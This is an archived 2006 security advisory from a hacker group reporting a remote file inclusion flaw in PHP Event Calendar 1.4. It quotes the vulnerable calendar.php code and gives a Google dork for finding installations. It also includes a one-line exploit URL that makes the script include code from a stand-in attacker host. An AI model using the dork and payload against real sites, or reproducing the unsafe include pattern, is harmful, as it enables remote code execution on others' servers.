PHP Event Calendar versi 1.4 (path_to_calendar) Remote File Inclusion

2006-07-24T00:00:00
ID SECURITYVULNS:DOC:13557
Type securityvulns
Reporter Securityvulns
Modified 2006-07-24T00:00:00

Description

#######################SolpotCrew Community

PHP Event Calendar versi 1.4 (path_to_calendar) Remote File Inclusion

Vendor site : http://www.softcomplex.com/products/php_event_calendar/

Bug Found By :Solpot a.k.a (k. Hasibuan) (13th july 2006)

contact: chris_hasibuan@yahoo.com

Website : http://www.solpotcrew.org/adv/solpot-adv-01.txt

Greetz: choi , h4ntu , Ibnusina , Lappet_tutung , ilalang23 , r4dja ,

L0sTBoy , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa

home_edition2001 , Anggands , Rendy , cow_1seng

and all crew #mardongan @ irc.dal.net

Input passed to the "path_to_calendar" is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.

code from calendar.php

if(!$path_to_calendar){ $path_to_calendar = $_path_to_calendar; } extract($HTTP_POST_VARS); extract($HTTP_GET_VARS); include_once $path_to_calendar.'db.php'; function show_calendar($index_calendar='') { global $db,$path_to_data,$settings;

Google dork : inurl:/cl_files/

exploit : http://somehost/path_to_cl_files/calendar.php?path_to_calendar=http://evilcode

########################MY LOVE JUST FOR U RIE
################################E.O.F